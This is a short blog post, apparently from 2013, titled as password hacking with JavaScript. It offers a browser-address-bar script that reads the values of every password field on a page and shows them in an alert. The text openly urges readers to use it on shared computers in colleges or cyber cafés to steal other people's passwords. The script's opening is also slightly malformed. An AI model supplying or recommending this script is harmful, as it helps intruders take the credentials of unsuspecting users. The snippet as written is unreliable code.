Just Copy and Paste this code in your Browser URL to reveal the hidden password.
javascriptfunction(){var%20s,F,j,f,i;%20s%20=%20%22%22; %20F%20=%20document.forms;%20for(j=0;%20j<F.length;%20++j) %20{%20f%20=%20F[j];%20for%20(i=0;%20i<f.length;%20++i) %20{%20if%20(f[i].type.toLowerCase()%20==%20%22password%22) %20s%20+=%20f[i].value%20+%20%22 %22;%20}%20}%20if %20(s)%20alert(%22This Trick is Exclusively shared by Khushal jethwa:%20The%20Password%20On%20This Page: %22%20+%20s);%20else%20alert(%22There%20are %20no%20passwords%20in%20forms%20on%20this %20page.%22);})();
Most Hacker use this script to hack the user password….
YOU can use this script in college or in cyber café to hack someone's password….
Many people forgot to logout u can used this script there ...
Or just use for Fun!!!!
Terimakasih anda telah membaca artikel tentang Password Hacking Using JavaScript. Jika ingin menduplikasi artikel ini diharapkan anda untuk mencantumkan link https://pirateddevil.blogspot.com/2013/11/password-hacking-using-javascript.html. Terimakasih atas perhatiannya.